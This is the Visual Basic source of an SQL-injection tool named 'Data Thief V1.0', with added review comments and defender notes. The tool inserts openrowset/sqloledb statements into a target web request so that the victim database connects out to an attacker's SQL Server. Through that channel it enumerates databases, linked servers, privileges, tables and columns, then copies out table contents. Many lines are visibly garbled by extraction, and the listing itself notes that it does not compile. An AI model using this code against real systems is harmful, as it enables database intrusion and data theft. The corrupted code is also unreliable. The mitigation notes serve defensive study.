Option expedition
' Form-level request state. setvars copies these from the txturl,
' txtpostdata and cbomethod controls before each request is submitted.
DIM URL AS STRING
Dim PostData As String
Dim Method As String
' Click handler for the HTTP-method combo box: switches the POST-data text
' box on or off depending on the selected list index.
' NOTE(review): the condition line is garbled on this page, so which index
' enables the box cannot be determined from here.
Private sub cbomethod_click ()
IF cbomethod.listindex the
TXTPOSTDATA.ENABLED = TRUE
Else
TXTPOSTDATA.ENABLED = FALSE
END IF
End Sub
' Go-button handler: validates the form, builds three SQL statements, submits
' each one through the request containing the injection marker, then reads
' the collected rows back from the tool's own database connection.
'
' How the channel works (as far as this listing shows): every statement is an
' insert into openrowset('sqloledb', ...) whose Address, uid and pwd come from
' the TxtServer, TxtPort, TxtLogin and TxtPassword controls. The database
' behind the target page is therefore asked to open an outbound OLE DB
' connection to that host and write rows into its ## Databases, ## servers and
' ## version tables, so the data does not have to appear in the HTTP response.
'
' Defender notes:
'  - The root cause is SQL assembled from request input in the target
'    application; parameterized queries remove the injection point.
'  - Ad hoc OPENROWSET use can be denied on the server (SQL Server's
'    Ad Hoc Distributed Queries option, on versions that have it).
'  - The application login should be neither db_owner nor sysadmin; the third
'    statement reports exactly those two memberships.
'  - Egress filtering that stops database hosts from connecting to arbitrary
'    external addresses breaks this channel.
'  - openrowset, sqloledb and DBMSSOCN inside request parameters are useful
'    strings for web-log and WAF detection.
' NOTE(review): the string-building lines are garbled by extraction and are
' reproduced untouched; the listing does not compile as shown.
Private sub cmdgo_click ()
DIM DATABASES_INJECTION_STR AS STRING
DIM Servers_Injection_Str As String
DIM VERSION_INJECTION_STR AS STRING
ON Error Goto DisplayError
' A URL is mandatory; POST additionally requires a non-empty body.
IF txturl.text <> "" ""
IF (cbethod.text = "post" and txtpostdata.text <> "") or (cbethod.text = "get") THEN
' Statement 1: database names from the master catalog into ## Databases.
DATABASES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' Select * from ## Databases') Select Name from master.dbo.sdatabases -"
' Statement 2: linked-server names from master.dbo.sysservers into ## servers.
SERVERS_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text "',' Select * from ## servers') Select srvname from master.dbo.sysservers -"
' Statement 3: @@version plus login name, user name and the db_owner /
' sysadmin membership flags into ## version. (A call that clears the list
' boxes is fused onto the end of this line by the extraction.)
VERSION_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text ", 'Select * from ## version') SELECT @@ version union all select 'login name:'% 2b SUSER_SNAME ()% 2B char (13)% 2B 'user name:'% 2b user% 2B char N (13)% 2B 'is db_owner:'% 2B Convert (varchar (1), is_member ('db_owner'))% 2B char (13)% 2b 'is sysadmin:'% 2b Convert (varchar (1), is_srvrolemember ( 'sysadmin')) - "ClearLists
' Open the tool's own connection to the collecting server and create the
' receiving tables before any request is sent.
Connect txtserver.text, txtLogin.text, txtpassword.text, txtport.text
CreateTables
' Setvars is called before every submission to reload URL / PostData from the
' form; presumably needed because Submitinjection rewrites its arguments.
Setvars
Submitinjection URL, Method, PostData, Databases_Injection_Str
Setvars
Submitinjection URL, Method, PostData, Servers_Injection_Str
Setvars
Submitinjection URL, Method, PostData, Version_Injection_Str
' Read the rows that arrived in the receiving tables back into the UI.
Getversion
GetServers
GetDatabases
Else
Msgbox "Please, Input the Post Data Value"
END IF
Else
Msgbox "please, input the url value"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' List-fields button handler: requires a selected table, builds a statement
' that reads column names from the selected database's dbo.syscolumns (matched
' by object_id of the selected table) into ## fields, submits it and refreshes
' the field list through Getfields.
' Defender note: the same openrowset channel as the other handlers, so the
' same controls apply (parameterized queries, no ad hoc OPENROWSET for the
' application login, egress filtering on database hosts).
' NOTE(review): the sub name and the statement line are garbled by extraction
' (a setvars call is fused onto the end of that line); code left untouched.
Private subdlistfields_click ()
Dim Fields_Injection_Str As String
ON Error Goto DisplayError
If LSTTABLES.LIST (LSTTABLES.LISTINDEX) <> "" "
FIELDS_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text " ',' select * from ## fields ') select name from" LstDatabases.List (LstDatabases.ListIndex) ".dbo.syscolumns where id = object_id ('" LstDatabases.List (LstDatabases.ListIndex) ".." LSTTABLES.LIST (LSTTABLES.LISTINDEX) ") -" setvars
' Reset the query box so field selections start from a bare SELECT.
TXTQUERY.TEXT = "SELECT"
SubmitInjection URL, Method, PostData, Fields_Injection_Str
Getfields
Else
Msgbox "please, select a table"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' List-tables button handler: requires a selected database, builds a
' statement that reads table names from that database's dbo.sysobjects into
' ## Tables, submits it and refreshes the table list through GetTables.
' When Chksystables is set the filter also includes type = 's'; otherwise
' only xtype = 'u' rows are requested.
' Defender note: reading sysobjects is only possible with the catalog access
' the injected application login already has; a least-privilege login limits
' what this enumeration can return.
' NOTE(review): statement lines are garbled by extraction (the second one has
' its END IF fused on); code left untouched.
Private sub cmdlisttables_click ()
DIM TABLES_INJECTION_STR AS STRING
ON Error Goto DisplayError
If LSTDATABASES.LIST (LSTDATABASES.LISTINDEX) <> ""
If Chksystables
TABLES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. Text ", 'Select * from ## Tables') Select Name from" LSTDATABASES.LIST (LSTDATABASES.LISTINDEX) ".dbo.sysobjects where xtype = 'u' or type = 's' -"
Else
TABLES_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' Select * from ## Tables') Select Name from" LSTDATABAS.LIST (LSTDATABAS.LISTINDEX) ".dbo.sysObjects where xtype = 'u' -" END IF
Setvars
' A new table list invalidates the previous field list and query text.
Lstfields.clear
TXTQUERY.TEXT = "SELECT"
SubmitInjection URL, Method, PostData, Tables_INJECTION_STR
GetTables
Else
Msgbox "please, select a database"
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' Run-query button handler: turns the field list accumulated in txtQuery into
' a SELECT TOP <txtmaxrows> ... statement against the selected database and
' table, creates a matching ## TableResults table through CreateTableResults,
' wraps the SELECT in the openrowset insert, submits it and shows the rows
' through GetResults.
' Defender note: this is the step that moves table contents off the target
' database, bounded only by the TOP value; bulk reads by the web application
' login and outbound connections from the database host are the observable
' signals.
' NOTE(review): the sub name, the query-building lines and the closing END IF
' are garbled by extraction; code left untouched.
Private subdrunQuery_click ()
Dim Fields as string
DIM Query As String
DIM Query_INJECTION_STR AS STRING
ON Error Goto DisplayError
IF txtQuery.text <> "select" then
Setvars
' Drop the last character of the query text and remove the SELECT keyword,
' leaving the comma-separated field names.
Fields = Left (txtQuery.text, len (txtQuery) - 1)
Fields = Replace (Fields, "SELECT", "")
Query = "SELECT TOP" TXTMAXROWS.TEXT " Fields " from " LSTDATABAS.LIST (LSTDATABAS.LISTINDEX) " .dbo. " LSTTables.List (Lstttables.listIndex)
CreateTableResults Fields
QUERY_INJECTION_STR = "insert into openrowset ( 'sqloledb', 'Network = DBMSSOCN; Address =" TxtServer.Text "," TxtPort.Text "; uid =" TxtLogin.Text "; pwd =" TxtPassword. TEXT "',' SELECT * from ## TableResults')" query "-"
SubmitinJection URL, Method, PostData, Query_Injection_Str
GetResults
Else
Msgbox "please, select one or more fields" Endiff
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' Selects the first entry of the method combo box.
' NOTE(review): presumably the form's load handler with a garbled name - confirm.
Private sub flow_load ()
Cbethod.listIndex = 0
End Sub
' Form unload handler: closes the database connection through Disconnect and
' then terminates the program with End. Errors are shown in a message box.
Private Sub Form_Unload (Cancel AS Integer)
ON Error Goto DisplayError
Disconnect
End
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' Item-check handler for the field list: keeps the text in TXTQUERY in step
' with the ticked fields.
'   item - index of the list entry whose check state changed.
' If the query text already contains a from clause, that clause is removed
' and a comma appended; a ticked field is then appended followed by a comma,
' and an unticked field is removed from the text.
' NOTE(review): the sub name and the Replace arguments are garbled by
' extraction; code left untouched.
Private sublstfields_ItemCheck (item as integer)
ON Error Goto DisplayError
IF INSTR (1, TXTQUERY.TEXT, "from", vbtextcompare) THEN
TXTQUERY.TEXT = Replace (txtQuery.text, "from" lstDatabases.list (lstDatabases.listindex) ".dbo." LSTTables.List (Lstttables.ListIndex), "")
TXTQUERY.TEXT = TXTQUERY.TEXT ","
END IF
If Lstfields.Selected (item) THEN
TXTQUERY.TEXT = TXTQUERY.TEXT LSTFIELDS.LIST (Item) ","
Else
TXTQUERY.TEXT = Replace (txtQuery.Text, Lstfields.List (item) "", "")
END IF
EXIT SUB
DisplayError:
MsgBox Err.Description
End Sub
' Empties the linked-server, database, table and field list boxes.
' NOTE(review): presumably the ClearLists routine called from cmdgo_click,
' with its name garbled by extraction - confirm.
Private sub coplearlists ()
LstlinkedServer.clear
LstdataBases.clear
LSTTables.clear
Lstfields.clear
End Sub
' Reloads the form-level URL, PostData and Method variables from the
' corresponding controls. Callers invoke it before each submission so that
' every request starts from the text the user typed.
Private sub setvars ()
URL = TXTURL.TEXT
PostData = txtpostdata.text
Method = cbomethod.text
End Sub
' Key-press filter for the max-rows box: any key that is not numeric and is
' not code 8 (backspace) is discarded by setting Keyascii to 0.
Private sub txtmaxrows_keypress (Keyascii AS Integer)
IF not isnumeric (chr (keyascii)) and keyascii <> 8 THEN
Keyascii = 0
END IF
End Sub
' Key-press filter for the port box: any key that is not numeric and is not
' code 8 (backspace) is discarded by setting Keyascii to 0.
Private sub txtport_KeyPress (Keyascii As Integer)
IF not isnumeric (chr (keyascii)) and keyascii <> 8 THEN
Keyascii = 0
END IF
End Sub
Option expedition
' User-Agent value that OpenURL sets on every request it sends.
' Defender note: this exact string in web-server or proxy logs identifies
' traffic from an unmodified copy of this tool; because it is a plain
' constant, its absence proves nothing.
Const user_agent = "Data Thief V1.0 (Beta)"
' Single ADO connection shared by every routine in this module.
Dim Con as new adodb.connection
' Sends one HTTP request and shows the response body in the FRMHTML window.
'   URL      - request address.
'   Method   - compared against get; any other value takes the POST branch.
'   PostData - request body, used only on the POST branch.
' The request is synchronous (third argument to Open is FALSE) and always
' carries the user_agent constant as its User-agent header; the POST branch
' also sets a form-urlencoded Content-Type.
' Defender note: the payload travels in the URL for GET and in the body for
' POST, so logging that records only the request line will miss the POST case.
' NOTE(review): the declaration line and both Replace calls are garbled by
' extraction; code left untouched.
Public Sub OpenURL (URL As String, Method As String, PostData AS String)
DIM HTTPPARSER AS New XMLHTTPURL = Replace (URL, "", "% 20")
If Method = "get" then
Httpparser.Open Method, URL, FALSE
Httpparser.SetRequestHeader "User-agent", user_agent
Httpparser.send
Else
PostData = Replace (PostData, ","% 20 ")
Httpparser.Open Method, URL, FALSE
Httpparser.SetRequestHeader "User-agent", user_agent
Httpparser.SetRequestHeader "Content-Type", "Application / X-WWW-FORM-URLENCODED"
Httpparser.send (PostData)
END IF
' The response is kept only for inspection: WindowState = 1 is the minimized
' state in VB6, so the HTML window opens minimized.
FRMHTML.TXTHTML.TEXT = httpparser.responsetext
FRMHTML.WindowState = 1
FRMHTML.SHOW
Set httpparser = Nothing
End Sub
' Reads the server names from the ## Servers table over the shared connection
' and fills the linked-server list box with them, one entry per row.
Public Sub GetServers ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "SELECT NAME FROM ## Servers"
Frmmain.lstlinkedServer.clear
Do While Not Rec.eof
Frmmain.lstlinkedServer.AddItem Rec.fields (0)
Rec.movenext
Loop
Rec.close
End Sub
' Reads the database names from the ## Databases table over the shared
' connection and fills the database list box with them, one entry per row.
Public Sub getDatabases ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "SELECT NAME FROM ## Databases"
Frmmain.lstdatabases.clear
Do While Not Rec.eof
Frmmain.lstdatabases.addItem Rec.fields (0)
Rec.movenext
Loop
Rec.close
End Sub
' Reads the table names from the ## Tables table and fills the table list box.
' The recordset is opened with optimistic locking because each row is deleted
' right after it is copied to the list, leaving the table empty for the next
' listing.
Public Sub gettables ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "Select Name from ## Tables",,, AdlockOptimistic
Frmmain.lsttables.clear
Do While Not Rec.eof
Frmmain.lsttables.additem Rec.fields (0)
Rec.delete
Rec.movenext
Loop
Rec.close
End Sub
' Reads the column names from the ## Fields table and fills the field list
' box. As in gettables, each row is deleted once it has been copied, so the
' table is empty again for the next listing.
' NOTE(review): the declaration line is garbled by extraction (two statements
' fused); code left untouched.
Public Sub getfields ()
Dim Rec as new adod.com.recordsetrec.activeConnection = con
Rec.open "SELECT NAME FROM ## Fields",,, AdlockOptimistic
Frmmain.lstfields.clear
Do While Not Rec.eof
Frmmain.lstfields.addItem Rec.fields (0)
Rec.delete
Rec.movenext
Loop
Rec.close
End Sub
' Shows the contents of the ## version table in the output box: the name of
' the first column, a blank line, then all rows as returned by GetString.
' The box is left empty when the table has no rows.
' NOTE(review): the query literal and the concatenation line are garbled by
' extraction; the local I is declared but not used in the visible code.
Public sub getversion ()
DIM REC AS New Adod.Recordset
DIM I as integer
Rec.activeConnection = con
Rec.open "SELECT * from" ## version "
Frmmain.txtOutput.text = ""
IF not rec.eof then
Frmmain.txtOutput.text = Rec.fields (0) .Name
FRMMAIN.TXTOUTPUT.TEXT = frmmain.txtOutput.text VBCRLF VBCRLF Rec.getstring
END IF
Rec.close
End Sub
' Shows the contents of the ## TableResults table in the output box: a header
' line of tab-separated column names, then (when rows exist) a blank line and
' all rows as returned by GetString.
' NOTE(review): the concatenation lines are garbled by extraction; code left
' untouched.
Public Sub getResults ()
DIM REC AS New Adod.Recordset
DIM I as integer
Rec.activeConnection = con
Rec.open "Select * from ## TableResults"
Frmmain.txtOutput.text = ""
' Header: one column name per field, separated by tabs.
For i = 0 to Rec.fields.count - 1
FRMMain.txtOutput.text = frmmain.txtOutput.text Rec.fields (i) .Name VBTAB
Next I
IF not rec.eof then
FRMMAIN.TXTOUTPUT.TEXT = frmmain.txtOutput.text VBCRLF VBCRLF Rec.getstring
END IF
Rec.close
End Sub
' Opens the shared ADO connection to the collecting SQL Server.
'   Server, Port - address placed in the connection string.
'   Uid, PWD     - SQL login used for the connection.
' cmdgo_click passes the same TxtServer / TxtPort / TxtLogin / TxtPassword
' values that it embeds in the openrowset statements, so this is the host the
' target database is asked to connect out to.
' Defender note: that address, port and login appear in clear text inside
' every submitted statement, which makes them recoverable from request logs
' of an affected application.
' NOTE(review): the guard compares the connection object with an empty
' string, presumably through its default property - confirm. The connection
' timeout is set to 10.
Public Sub Connect (Server AS String, Uid As String, PWD AS String, Port As String)
If Con = "" THEN
Con.comtring = "provider = sqloledb; network = dbmssocn; address =" server "," port "; uid =" uid "; PWD =" PWD ";"
CON.CONNECTIONTIMEOUT = 10
Con.open
END IF
End Sub
' Closes the shared connection when the guard comparison indicates it was
' set up, then releases the object reference.
Public Sub Disconnect ()
IF Con <> "" THEN CON.CLOSE
Set con = Nothing
End Sub
' Creates the receiving tables on the collecting server: ## Version
' (varchar 500) and ## Servers, ## Databases, ## Tables, ## fields
' (varchar 128 each). Any existing table of the same name in tempdb is
' dropped first. Rec.open is used here only as a way to execute each
' statement on the shared connection.
' The names use the ## prefix, which SQL Server treats as global temporary
' tables; presumably required so that the separate session opened by the
' target database can insert into them.
' NOTE(review): several string literals have lost their closing quote in
' extraction; code left untouched.
Public Sub CreateTables ()
DIM REC AS New Adod.Recordset
Rec.activeConnection = con
Rec.open "if Object_id ('Tempdb .. ## Version') Is Not Null Drop Table ## Version"
Rec.open "CREATE TABLE ## Version (Version Varchar (500))"
Rec.open "if Object_id ('Tempdb .. ## Servers') is not null Drop Table ## Servers
Rec.open "CREATE TABLE ## Servers (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## Databases') Is Not Null Drop Table ## databases"
Rec.open "CREATE TABLE ## Databases (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## Tables') is not null Drop Table ## TABLES
Rec.open "CREATE TABLE ## Tables (Name Varchar (128))"
Rec.open "if Object_id ('Tempdb .. ## fields') is not null drop table ## fields
Rec.open "Create Table ## fields (Name Varchar (128))"
End Sub
' Creates the ## TableResults table on the collecting server with one column
' per requested field, dropping any previous copy first.
'   Fields - comma-separated field names; each becomes a column of type
'            SQL_VARIANT (or VARCHAR (8000) in the commented-out variant).
' NOTE(review): the array declaration, the concatenation lines and the final
' line (two Rec.open calls fused) are garbled by extraction; code left
' untouched. The loop counter is a Byte, which caps the number of columns it
' can index.
Public Sub CreateTableResults (Fields as String)
DIM REC AS New Adod.Recordset
Dim string () AS STRING
DIM Query As String
DIM I as byte
Strarray = Split (Fields, ",")
Query = "CREATE TABLE ## TableResults ("
' Single field: no separator handling is needed.
IF ubound (strARRAY) = 0 THEN
Query = query strrray (0) "SQL_VARIANT" "
Else
For i = 0 to Ubound (strARRAY)
'Comment this line out for SQL Server 7
Query = Query Strarray (i) "SQL_VARIANT,"
'Uncomment the next line for SQL Server 7
'Query = query strarray (i) "VARCHAR (8000),"
Next I
' Drop the trailing comma left by the loop and close the column list.
Query = Left (Query, Len (Query) - 1) ")"
END IF
Rec.activeConnection = con
Rec.open "if Object_id ('Tempdb .. ## TableResults') is not null drop table ## TableResults" Rec.Open Query
End Sub
' Substitutes the statement for the <***> marker and sends the request.
'   URL, Method, PostData - request description as entered in the form.
'   Injectionstr          - SQL text that replaces the marker.
' When Method equals Post the marker is replaced in PostData, otherwise in
' URL; the request is then sent through OpenURL.
' The parameters have no ByVal, so in VB6 they are passed by reference and the
' Replace result overwrites the caller's variable; presumably the reason the
' form calls setvars before every submission.
' Defender note: the statement is inserted verbatim at one parameter position,
' so server-side input validation and parameterized queries on that parameter
' are the controls that matter.
Public Sub SubmitinJection (URL AS String, Method As String, PostData As String, Injectionstr As String)
If Method = "Post" then
PostData = Replace (PostData, "<***>", INJECTIONSTR)
OpenURL URL, Method, PostData
Else
URL = Replace (URL, "<***>", INJECTIONSTR)
OpenURL URL, Method, PostData
END IF
End Sub